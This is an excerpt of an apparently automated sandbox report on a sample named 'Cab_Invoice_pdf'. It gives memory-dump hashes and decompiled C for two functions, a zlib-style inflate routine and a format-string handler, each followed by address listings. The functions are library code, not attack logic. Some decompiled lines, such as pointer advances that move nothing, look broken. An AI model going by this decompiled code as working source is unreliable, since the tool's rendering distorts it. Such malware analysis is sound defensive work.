                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93b188c958fcbe0a098e5c2411b6fa7eb5cfcd7fdd27c197b56135e9b3efa640
                            • Instruction ID: 80a56e7253b75c408cd1457966e6dedf6a1bc2b067061b5ffc6caa0a8c569f81
                            • Opcode Fuzzy Hash: 93b188c958fcbe0a098e5c2411b6fa7eb5cfcd7fdd27c197b56135e9b3efa640
                            • Instruction Fuzzy Hash: E842CDB0A047029FE718CF1CC58472ABBE1FFC5308F44862DE9588B69AD375E55ACB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01317440, Relevance: .4, Instructions: 371COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01317440() {
				signed char* _t144;
				signed int _t161;
				signed char* _t170;
				signed int _t182;
				void* _t184;
				signed int _t185;
				signed char _t190;
				signed int _t197;
				signed int _t198;
				signed char _t200;
				signed int _t201;
				signed int _t202;
				signed char* _t203;
				signed char* _t208;
				signed int _t225;
				signed char* _t236;
				unsigned int _t237;
				signed char* _t239;
				unsigned int _t241;
				signed char** _t243;
				signed char _t250;
				signed char** _t252;
				signed char _t256;
				signed char _t257;
				signed char* _t259;
				void* _t261;
				void* _t263;
				signed char _t264;
				signed char _t266;
				signed char _t271;
				signed char _t274;
				signed char _t279;
				signed char* _t280;
				signed int _t281;
				signed char* _t282;
				signed char _t284;
				signed char _t285;
				signed char _t286;
				signed char _t287;
				signed char _t288;
				void* _t291;
				signed char _t294;
				signed char* _t295;
				unsigned int _t297;
				void* _t301;
				signed char* _t302;
				void* _t304;
				signed int* _t306;
				signed int _t307;
				signed int _t308;
				void* _t309;

				_t243 =  *(_t309 + 0x4c);
				_t236 = _t243[7];
				_t280 =  *_t243;
				_t306 = _t243[3];
				 *(_t309 + 0x38) =  &(( &(_t243[1][0xfffffffffffffffb]))[_t280]);
				_t144 = _t243[4];
				_t307 = _t236[0x40];
				 *(_t309 + 0x14) =  &(( &(_t144[0xfffffffffffffeff]))[_t306]);
				 *(_t309 + 0x30) = _t236[0x2c];
				 *(_t309 + 0x44) = _t236[0x30];
				 *(_t309 + 0x34) = _t236[0x34];
				 *(_t309 + 0x20) = _t236[0x38];
				 *(_t309 + 0x28) = _t236[0x50];
				 *(_t309 + 0x2c) = _t236[0x54];
				 *(_t309 + 0x18) = 1;
				 *((intOrPtr*)(_t309 + 0x40)) = _t144 -  *(_t309 + 0x50) + _t306;
				 *(_t309 + 0x18) =  *(_t309 + 0x18) << _t236[0x58];
				 *(_t309 + 0x18) =  *(_t309 + 0x18) - 1;
				 *(_t309 + 0x1c) = _t236;
				_t297 = _t236[0x3c];
				 *(_t309 + 0x10) = _t280;
				 *(_t309 + 0x3c) = (1 << _t236[0x5c]) - 1;
				do {
					if(_t307 < 0xf) {
						_t297 = _t297 + (( *_t280 & 0x000000ff) << _t307) + ((_t280[1] & 0x000000ff) << _t307 + 8);
						 *(_t309 + 0x10) =  &(_t280[2]);
						_t307 = _t307 + 0x10;
					}
					_t237 =  *( *(_t309 + 0x28) + ( *(_t309 + 0x18) & _t297) * 4);
					_t250 = _t237 >> 0x00000008 & 0x000000ff;
					_t297 = _t297 >> _t250;
					_t307 = _t307 - _t250;
					_t281 = _t237 & 0x000000ff;
					if(_t237 == 0) {
						L7:
						 *_t306 = _t237 >> 0x10;
						_t306 =  &(_t306[0]);
						L47:
						_t280 =  *(_t309 + 0x10);
						_t239 =  *(_t309 + 0x14);
						if(_t280 >=  *(_t309 + 0x38)) {
							L62:
							_t161 = _t307 >> 3;
							_t282 = _t280 - _t161;
							_t308 = _t307 - (_t161 << 3);
							_t252 =  *(_t309 + 0x4c);
							_t252[1] =  *(_t309 + 0x38) - _t282 + 5;
							_t252[3] = _t306;
							 *_t252 = _t282;
							_t252[4] = _t239 - _t306 + 0x101;
							_t170 =  *(_t309 + 0x1c);
							_t170[0x3c] = _t297 & (0x00000001 << _t308) - 0x00000001;
							_t170[0x40] = _t308;
							return _t170;
						}
						goto L48;
					}
					while((_t281 & 0x00000010) == 0) {
						if((_t281 & 0x00000040) != 0) {
							_t203 =  *(_t309 + 0x1c);
							_t239 =  *(_t309 + 0x14);
							_t280 =  *(_t309 + 0x10);
							if((_t281 & 0x00000020) == 0) {
								( *(_t309 + 0x4c))[6] = "invalid literal/length code";
								L61:
								_t203[4] = 0x3f51;
								goto L62;
							}
							_t203[4] = 0x3f3f;
							goto L62;
						}
						_t237 =  *( *(_t309 + 0x28) + (((0x00000001 << _t281) - 0x00000001 & _t297) + (_t237 >> 0x10)) * 4);
						_t279 = _t237 >> 0x00000008 & 0x000000ff;
						_t297 = _t297 >> _t279;
						_t307 = _t307 - _t279;
						_t281 = _t237 & 0x000000ff;
						if(_t237 != 0) {
							continue;
						}
						goto L7;
					}
					_t241 = _t237 >> 0x10;
					_t284 = _t281 & 0x0000000f;
					if(_t284 != 0) {
						_t274 = _t284;
						_t225 = (0x00000001 << _t274) - 0x00000001 & _t297;
						_t297 = _t297 >> _t274;
						_t241 = _t241 + _t225;
						_t307 = _t307 - _t284;
					}
					if(_t307 < 0xf) {
						_t295 =  *(_t309 + 0x10);
						_t297 = _t297 + (( *_t295 & 0x000000ff) << _t307) + ((_t295[1] & 0x000000ff) << _t307 + 8);
						 *(_t309 + 0x10) =  &(_t295[2]);
						_t307 = _t307 + 0x10;
					}
					_t285 =  *( *(_t309 + 0x2c) + ( *(_t309 + 0x3c) & _t297) * 4);
					_t256 = _t285 >> 0x00000008 & 0x000000ff;
					 *(_t309 + 0x50) = _t285;
					_t307 = _t307 - _t256;
					_t286 = _t285 & 0x000000ff;
					_t297 = _t297 >> _t256;
					if((_t286 & 0x00000010) != 0) {
						L17:
						 *(_t309 + 0x50) =  *(_t309 + 0x50) >> 0x10;
						_t287 = _t286 & 0x0000000f;
						if(_t307 < _t287) {
							_t266 = _t307;
							_t307 = _t307 + 8;
							_t297 = _t297 + (( *( *(_t309 + 0x10)) & 0x000000ff) << _t266);
							_t208 =  &(( *(_t309 + 0x10))[1]);
							 *(_t309 + 0x10) = _t208;
							if(_t307 < _t287) {
								 *(_t309 + 0x10) =  &(( *(_t309 + 0x10))[1]);
								_t297 = _t297 + (( *_t208 & 0x000000ff) << _t307);
								_t307 = _t307 + 8;
							}
						}
						_t257 = _t287;
						_t307 = _t307 - _t287;
						_t182 = (0x00000001 << _t257) - 0x00000001 & _t297;
						_t297 = _t297 >> _t257;
						 *(_t309 + 0x50) =  *(_t309 + 0x50) + _t182;
						_t184 = _t306 -  *((intOrPtr*)(_t309 + 0x40));
						_t288 =  *(_t309 + 0x50);
						 *(_t309 + 0x24) = _t297;
						if(_t288 <= _t184) {
							_t259 = _t306 - _t288;
							do {
								_t185 =  *_t259 & 0x000000ff;
								_t259 =  &(_t259[3]);
								 *_t306 = _t185;
								_t241 = _t241 - 3;
								_t306[0] =  *(_t259 - 2) & 0x000000ff;
								_t306[0] =  *(_t259 - 1) & 0x000000ff;
								_t306 =  &(_t306[0]);
							} while (_t241 > 2);
							if(_t241 != 0) {
								 *_t306 =  *_t259;
								_t306 =  &(_t306[0]);
								if(_t241 > 1) {
									 *_t306 = _t259[1];
									_t306 =  &(_t306[0]);
								}
							}
							goto L47;
						} else {
							_t261 = _t288 - _t184;
							if(_t261 <=  *(_t309 + 0x44)) {
								L23:
								_t190 =  *(_t309 + 0x34);
								_t301 =  *(_t309 + 0x20) - _t261;
								if(_t190 != 0) {
									_t302 = _t301 + _t190;
									if(_t190 >= _t261) {
										if(_t261 >= _t241) {
											L40:
											if(_t241 <= 2) {
												L43:
												if(_t241 != 0) {
													 *_t306 =  *_t302;
													_t306 =  &(_t306[0]);
													if(_t241 > 1) {
														 *_t306 = _t302[1];
														_t306 =  &(_t306[0]);
													}
												}
												_t297 =  *(_t309 + 0x24);
												goto L47;
											}
											_t291 = (0xaaaaaaab * (_t241 - 3) >> 0x20 >> 1) + 1;
											do {
												_t241 = _t241 - 3;
												 *_t306 =  *_t302 & 0x000000ff;
												_t306[0] = _t302[1] & 0x000000ff;
												_t197 = _t302[2] & 0x000000ff;
												_t302 =  &(_t302[3]);
												_t306[0] = _t197;
												_t306 =  &(_t306[0]);
												_t291 = _t291 - 1;
											} while (_t291 != 0);
											goto L43;
										}
										_t241 = _t241 - _t261;
										do {
											_t198 =  *_t302;
											_t302 =  &(_t302[1]);
											 *_t306 = _t198;
											_t306 =  &(_t306[0]);
											_t261 = _t261 - 1;
										} while (_t261 != 0);
										L39:
										_t302 = _t306 - _t288;
										goto L40;
									}
									_t302 =  &(_t302[ *(_t309 + 0x30)]);
									_t263 = _t261 - _t190;
									if(_t263 >= _t241) {
										goto L40;
									}
									_t241 = _t241 - _t263;
									_t304 = _t302 - _t306;
									do {
										 *_t306 =  *((intOrPtr*)(_t304 + _t306));
										_t306 =  &(_t306[0]);
										_t263 = _t263 - 1;
									} while (_t263 != 0);
									_t200 =  *(_t309 + 0x34);
									_t302 =  *(_t309 + 0x20);
									if(_t200 >= _t241) {
										goto L40;
									}
									_t264 = _t200;
									_t241 = _t241 - _t200;
									do {
										_t201 =  *_t302;
										_t302 =  &(_t302[1]);
										 *_t306 = _t201;
										_t306 =  &(_t306[0]);
										_t264 = _t264 - 1;
									} while (_t264 != 0);
									goto L39;
								}
								_t302 = _t301 +  *(_t309 + 0x30);
								if(_t261 >= _t241) {
									goto L40;
								}
								_t241 = _t241 - _t261;
								do {
									_t202 =  *_t302;
									_t302 =  &(_t302[1]);
									 *_t306 = _t202;
									_t306 =  &(_t306[0]);
									_t261 = _t261 - 1;
								} while (_t261 != 0);
								goto L39;
							}
							_t203 =  *(_t309 + 0x1c);
							if(_t203[0x1bc4] != 0) {
								( *(_t309 + 0x4c))[6] = "invalid distance too far back";
								goto L60;
							}
							goto L23;
						}
					} else {
						while((_t286 & 0x00000040) == 0) {
							_t294 =  *( *(_t309 + 0x2c) + (((0x00000001 << _t286) - 0x00000001 & _t297) + ( *(_t309 + 0x50) >> 0x10)) * 4);
							_t271 = _t294 >> 0x00000008 & 0x000000ff;
							 *(_t309 + 0x50) = _t294;
							_t307 = _t307 - _t271;
							_t286 = _t294 & 0x000000ff;
							_t297 = _t297 >> _t271;
							if((_t286 & 0x00000010) == 0) {
								continue;
							}
							goto L17;
						}
						_t203 =  *(_t309 + 0x1c);
						( *(_t309 + 0x4c))[6] = "invalid distance code";
						L60:
						_t239 =  *(_t309 + 0x14);
						_t280 =  *(_t309 + 0x10);
						goto L61;
					}
					L48:
				} while (_t306 < _t239);
				goto L62;
			}






















































                            0x01317447
                            0x0131744b
                            0x01317451
                            0x01317456
                            0x0131745b
                            0x0131745f
                            0x0131746f
                            0x01317472
                            0x0131747b
                            0x01317482
                            0x01317489
                            0x01317490
                            0x01317497
                            0x0131749e
                            0x013174a7
                            0x013174ab
                            0x013174b2
                            0x013174b9
                            0x013174c0
                            0x013174c4
                            0x013174c7
                            0x013174cb
                            0x013174d0
                            0x013174d3
                            0x013174ea
                            0x013174ec
                            0x013174f0
                            0x013174f0
                            0x013174fd
                            0x01317505
                            0x01317508
                            0x0131750a
                            0x0131750c
                            0x01317511
                            0x0131754c
                            0x0131754f
                            0x01317551
                            0x01317761
                            0x01317761
                            0x01317765
                            0x0131776d
                            0x0131780d
                            0x0131780f
                            0x01317812
                            0x01317817
                            0x01317822
                            0x01317834
                            0x01317837
                            0x0131783a
                            0x01317842
                            0x01317845
                            0x01317849
                            0x0131784e
                            0x01317856
                            0x01317856
                            0x00000000
                            0x0131776d
                            0x01317513
                            0x0131751b
                            0x013177bb
                            0x013177c2
                            0x013177c6
                            0x013177ca
                            0x013177d9
                            0x01317806
                            0x01317806
                            0x00000000
                            0x01317806
                            0x013177cc
                            0x00000000
                            0x013177cc
                            0x01317536
                            0x0131753e
                            0x01317541
                            0x01317543
                            0x01317545
                            0x0131754a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131754a
                            0x01317557
                            0x0131755a
                            0x0131755d
                            0x01317577
                            0x01317581
                            0x01317583
                            0x01317585
                            0x01317587
                            0x01317587
                            0x0131758c
                            0x0131758e
                            0x013175a7
                            0x013175a9
                            0x013175ad
                            0x013175ad
                            0x013175ba
                            0x013175c2
                            0x013175c5
                            0x013175c9
                            0x013175cb
                            0x013175ce
                            0x013175d3
                            0x01317612
                            0x01317612
                            0x01317617
                            0x0131761c
                            0x01317622
                            0x01317624
                            0x0131762c
                            0x01317632
                            0x01317633
                            0x01317639
                            0x01317640
                            0x01317646
                            0x01317648
                            0x01317648
                            0x01317639
                            0x0131764b
                            0x01317654
                            0x01317657
                            0x01317659
                            0x0131765b
                            0x01317661
                            0x01317665
                            0x01317669
                            0x0131766f
                            0x01317782
                            0x01317784
                            0x01317784
                            0x01317787
                            0x0131778a
                            0x0131778c
                            0x01317793
                            0x0131779a
                            0x0131779d
                            0x013177a0
                            0x013177a7
                            0x013177ab
                            0x013177ad
                            0x013177b1
                            0x013177b6
                            0x013177b8
                            0x013177b8
                            0x013177b1
                            0x00000000
                            0x01317675
                            0x01317677
                            0x0131767d
                            0x01317690
                            0x01317694
                            0x01317698
                            0x0131769c
                            0x013176b7
                            0x013176bb
                            0x01317701
                            0x01317716
                            0x01317719
                            0x01317749
                            0x0131774b
                            0x0131774f
                            0x01317751
                            0x01317755
                            0x0131775a
                            0x0131775c
                            0x0131775c
                            0x01317755
                            0x0131775d
                            0x00000000
                            0x0131775d
                            0x01317727
                            0x01317728
                            0x0131772b
                            0x0131772e
                            0x01317734
                            0x01317737
                            0x0131773b
                            0x0131773e
                            0x01317741
                            0x01317744
                            0x01317744
                            0x00000000
                            0x01317728
                            0x01317703
                            0x01317705
                            0x01317705
                            0x01317707
                            0x0131770a
                            0x0131770c
                            0x0131770d
                            0x0131770d
                            0x01317712
                            0x01317714
                            0x00000000
                            0x01317714
                            0x013176bd
                            0x013176c1
                            0x013176c5
                            0x00000000
                            0x00000000
                            0x013176c7
                            0x013176c9
                            0x013176d0
                            0x013176d3
                            0x013176d5
                            0x013176d6
                            0x013176d6
                            0x013176db
                            0x013176df
                            0x013176e5
                            0x00000000
                            0x00000000
                            0x013176e7
                            0x013176e9
                            0x013176f0
                            0x013176f0
                            0x013176f2
                            0x013176f5
                            0x013176f7
                            0x013176f8
                            0x013176f8
                            0x00000000
                            0x013176fd
                            0x0131769e
                            0x013176a4
                            0x00000000
                            0x00000000
                            0x013176a6
                            0x013176a8
                            0x013176a8
                            0x013176aa
                            0x013176ad
                            0x013176af
                            0x013176b0
                            0x013176b0
                            0x00000000
                            0x013176b5
                            0x0131767f
                            0x0131768a
                            0x013177f7
                            0x00000000
                            0x013177f7
                            0x00000000
                            0x0131768a
                            0x013175d5
                            0x013175d5
                            0x013175f7
                            0x013175ff
                            0x01317602
                            0x01317606
                            0x01317608
                            0x0131760b
                            0x01317610
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01317610
                            0x013177e6
                            0x013177ea
                            0x013177fe
                            0x013177fe
                            0x01317802
                            0x00000000
                            0x01317802
                            0x01317773
                            0x01317773
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9609dceef1e7e42849d35d45851ee18cc186e9c2db41e0cc93d51b924dafef7b
                            • Instruction ID: d3c3fdebb65d6e87ff62cbb280b362306f37c7bae4e23dc00719a142d7bcd9ae
                            • Opcode Fuzzy Hash: 9609dceef1e7e42849d35d45851ee18cc186e9c2db41e0cc93d51b924dafef7b
                            • Instruction Fuzzy Hash: 49D1BF356083928FC709CE2CC490529BBE2EFC9208F1C4A6DE8E58B74AD775D54ACB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131BB41, Relevance: .2, Instructions: 237COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E0131BB41(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t59;
				signed char _t61;
				signed int _t63;
				void* _t64;
				signed int _t65;
				signed char _t74;
				signed char _t77;
				void* _t85;
				void* _t87;
				signed char _t89;
				signed char _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int* _t103;
				void* _t105;
				signed int _t111;
				unsigned int _t113;
				signed char _t115;
				void* _t123;
				unsigned int _t124;
				void* _t125;
				signed int _t126;
				short _t127;
				void* _t130;
				void* _t132;
				void* _t134;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t52 =  *0x133c008; // 0xa3433343
				_v8 = _t52 ^ _t136;
				_t134 = __ecx;
				_t101 = 0;
				_t123 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t105 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E0131C573(_t134);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t134 + 0x30)) - _t101;
								if( *((intOrPtr*)(_t134 + 0x30)) != _t101) {
									L71:
									_t57 = 1;
									L72:
									E0131786A();
									return _t57;
								}
								_t124 =  *(_t134 + 0x20);
								_push(_t125);
								_v16 = _t101;
								_t59 = _t124 >> 4;
								_v12 = _t101;
								_t126 = 0x20;
								__eflags = 1 & _t59;
								if((1 & _t59) == 0) {
									L46:
									_t111 =  *(_t134 + 0x32) & 0x0000ffff;
									__eflags = _t111 - 0x78;
									if(_t111 == 0x78) {
										L48:
										_t61 = _t124 >> 5;
										__eflags = _t61 & 0x00000001;
										if((_t61 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t111 - 0x61;
											if(_t111 == 0x61) {
												L54:
												_t63 = 1;
												L55:
												_t127 = 0x30;
												__eflags = _t63;
												if(_t63 != 0) {
													L57:
													_t64 = 0x58;
													 *((short*)(_t136 + _t101 * 2 - 0xc)) = _t127;
													__eflags = _t111 - _t64;
													if(_t111 == _t64) {
														L60:
														_t65 = 1;
														L61:
														__eflags = _t65;
														asm("cbw");
														 *((short*)(_t136 + _t101 * 2 - 0xa)) = ((_t65 & 0xffffff00 | _t65 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t101 = _t101 + 2;
														__eflags = _t101;
														L62:
														_t130 =  *((intOrPtr*)(_t134 + 0x24)) -  *((intOrPtr*)(_t134 + 0x38)) - _t101;
														__eflags = _t124 & 0x0000000c;
														if((_t124 & 0x0000000c) == 0) {
															E0131AE08(_t134 + 0x448, 0x20, _t130, _t134 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E0131C873(_t134 + 0x448,  &_v16, _t101, _t134 + 0x18,  *((intOrPtr*)(_t134 + 0xc)));
														_t113 =  *(_t134 + 0x20);
														_t103 = _t134 + 0x18;
														_t74 = _t113 >> 3;
														__eflags = _t74 & 0x00000001;
														if((_t74 & 0x00000001) != 0) {
															_t115 = _t113 >> 2;
															__eflags = _t115 & 0x00000001;
															if((_t115 & 0x00000001) == 0) {
																E0131AE08(_t134 + 0x448, 0x30, _t130, _t103);
																_t137 = _t137 + 0x10;
															}
														}
														E0131C755(_t134, 0);
														__eflags =  *_t103;
														if( *_t103 >= 0) {
															_t77 =  *(_t134 + 0x20) >> 2;
															__eflags = _t77 & 0x00000001;
															if((_t77 & 0x00000001) != 0) {
																E0131AE08(_t134 + 0x448, 0x20, _t130, _t103);
															}
														}
														goto L71;
													}
													_t85 = 0x41;
													__eflags = _t111 - _t85;
													if(_t111 == _t85) {
														goto L60;
													}
													_t65 = 0;
													goto L61;
												}
												__eflags = _t63;
												if(_t63 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t132 = 0x41;
											__eflags = _t111 - _t132;
											if(_t111 == _t132) {
												goto L54;
											}
											_t63 = 0;
											goto L55;
										}
										goto L51;
									}
									_t87 = 0x58;
									__eflags = _t111 - _t87;
									if(_t111 != _t87) {
										goto L50;
									}
									goto L48;
								}
								_t89 = _t124 >> 6;
								__eflags = 1 & _t89;
								if((1 & _t89) == 0) {
									__eflags = 1 & _t124;
									if((1 & _t124) == 0) {
										_t91 = _t124 >> 1;
										__eflags = 1 & _t91;
										if((1 & _t91) == 0) {
											goto L46;
										}
										_v16 = _t126;
										L45:
										_t101 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t92);
									_v16 = _t92;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t94 = _t55;
						__eflags = _t94;
						if(__eflags == 0) {
							L28:
							_push(_t101);
							_push(0xa);
							L29:
							_t56 = E0131C30B(_t134, _t125, __eflags);
							goto L10;
						}
						__eflags = _t94 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E0131C4E8(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E0131C071(_t101, _t134);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t134 + 0x20;
						 *_t3 =  *(_t134 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E0131C455(__ecx, _t123);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E0131C4C9(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t105;
				if(_t140 > 0) {
					_t96 = _t54 - 0x5a;
					__eflags = _t96;
					if(_t96 == 0) {
						_t56 = E0131BEB4(__ecx);
						goto L10;
					}
					_t97 = _t96 - 7;
					__eflags = _t97;
					if(_t97 == 0) {
						goto L30;
					}
					__eflags = _t97;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0131C273(_t134, __eflags, _t101);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t123) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}














































                            0x0131bb49
                            0x0131bb50
                            0x0131bb55
                            0x0131bb57
                            0x0131bb5b
                            0x0131bb5e
                            0x0131bb62
                            0x0131bb63
                            0x0131bb66
                            0x0131bbd3
                            0x0131bbd6
                            0x0131bc25
                            0x0131bc25
                            0x0131bc28
                            0x0131bb94
                            0x0131bb96
                            0x0131bb9b
                            0x0131bb9d
                            0x0131bc43
                            0x0131bc46
                            0x0131bd8c
                            0x0131bd8c
                            0x0131bd8e
                            0x0131bd95
                            0x0131bd9d
                            0x0131bd9d
                            0x0131bc4c
                            0x0131bc51
                            0x0131bc54
                            0x0131bc57
                            0x0131bc5b
                            0x0131bc61
                            0x0131bc62
                            0x0131bc64
                            0x0131bc8e
                            0x0131bc8e
                            0x0131bc92
                            0x0131bc95
                            0x0131bc9f
                            0x0131bca1
                            0x0131bca4
                            0x0131bca6
                            0x0131bcac
                            0x0131bcac
                            0x0131bcae
                            0x0131bcae
                            0x0131bcb1
                            0x0131bcbf
                            0x0131bcbf
                            0x0131bcc1
                            0x0131bcc3
                            0x0131bcc4
                            0x0131bcc6
                            0x0131bccc
                            0x0131bcce
                            0x0131bccf
                            0x0131bcd4
                            0x0131bcd7
                            0x0131bce5
                            0x0131bce5
                            0x0131bce7
                            0x0131bce7
                            0x0131bcf2
                            0x0131bcf4
                            0x0131bcf9
                            0x0131bcf9
                            0x0131bcfc
                            0x0131bd02
                            0x0131bd04
                            0x0131bd07
                            0x0131bd17
                            0x0131bd1c
                            0x0131bd1c
                            0x0131bd31
                            0x0131bd36
                            0x0131bd39
                            0x0131bd3e
                            0x0131bd41
                            0x0131bd43
                            0x0131bd45
                            0x0131bd48
                            0x0131bd4b
                            0x0131bd58
                            0x0131bd5d
                            0x0131bd5d
                            0x0131bd4b
                            0x0131bd64
                            0x0131bd69
                            0x0131bd6c
                            0x0131bd71
                            0x0131bd74
                            0x0131bd76
                            0x0131bd83
                            0x0131bd88
                            0x0131bd76
                            0x00000000
                            0x0131bd8b
                            0x0131bcdb
                            0x0131bcdc
                            0x0131bcdf
                            0x00000000
                            0x00000000
                            0x0131bce1
                            0x00000000
                            0x0131bce1
                            0x0131bcc8
                            0x0131bcca
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131bcca
                            0x0131bcb5
                            0x0131bcb6
                            0x0131bcb9
                            0x00000000
                            0x00000000
                            0x0131bcbb
                            0x00000000
                            0x0131bcbb
                            0x00000000
                            0x0131bca8
                            0x0131bc99
                            0x0131bc9a
                            0x0131bc9d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131bc9d
                            0x0131bc68
                            0x0131bc6b
                            0x0131bc6d
                            0x0131bc78
                            0x0131bc7a
                            0x0131bc82
                            0x0131bc84
                            0x0131bc86
                            0x00000000
                            0x00000000
                            0x0131bc88
                            0x0131bc8c
                            0x0131bc8c
                            0x00000000
                            0x0131bc8c
                            0x0131bc7c
                            0x0131bc71
                            0x0131bc71
                            0x0131bc72
                            0x00000000
                            0x0131bc72
                            0x0131bc6f
                            0x00000000
                            0x0131bc6f
                            0x0131bba3
                            0x0131bba3
                            0x00000000
                            0x0131bba3
                            0x0131bc2f
                            0x0131bc2f
                            0x0131bc32
                            0x0131bc04
                            0x0131bc04
                            0x0131bc05
                            0x0131bc07
                            0x0131bc09
                            0x00000000
                            0x0131bc09
                            0x0131bc34
                            0x0131bc37
                            0x00000000
                            0x00000000
                            0x0131bc3d
                            0x0131bbac
                            0x0131bbac
                            0x00000000
                            0x0131bbac
                            0x0131bbd8
                            0x0131bc1b
                            0x00000000
                            0x0131bc1b
                            0x0131bbda
                            0x0131bbdd
                            0x0131bc10
                            0x0131bc12
                            0x00000000
                            0x0131bc12
                            0x0131bbdf
                            0x0131bbe2
                            0x0131bc00
                            0x0131bc00
                            0x0131bc00
                            0x0131bc00
                            0x00000000
                            0x0131bc00
                            0x0131bbe4
                            0x0131bbe7
                            0x0131bbf9
                            0x00000000
                            0x0131bbf9
                            0x0131bbe9
                            0x0131bbec
                            0x00000000
                            0x00000000
                            0x0131bbf0
                            0x00000000
                            0x0131bbf0
                            0x0131bb68
                            0x00000000
                            0x00000000
                            0x0131bb6e
                            0x0131bb70
                            0x0131bbb0
                            0x0131bbb0
                            0x0131bbb3
                            0x0131bbcc
                            0x00000000
                            0x0131bbcc
                            0x0131bbb5
                            0x0131bbb5
                            0x0131bbb8
                            0x00000000
                            0x00000000
                            0x0131bbbb
                            0x0131bbbe
                            0x00000000
                            0x00000000
                            0x0131bbc0
                            0x0131bbc3
                            0x00000000
                            0x0131bbc3
                            0x0131bb72
                            0x0131bbaa
                            0x00000000
                            0x0131bbaa
                            0x0131bb76
                            0x00000000
                            0x00000000
                            0x0131bb7f
                            0x00000000
                            0x00000000
                            0x0131bb84
                            0x00000000
                            0x00000000
                            0x0131bb89
                            0x00000000
                            0x00000000
                            0x0131bb92
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56236ffcfb9b47a1f1cb54b1aabb10f73a4baa927081c31a6a0e74f79bbb6241
                            • Instruction ID: f45e17dc1d8471f09d9a8fca85a8be5a256ebf4ef9a8d3a7f44f5dcfda626c45
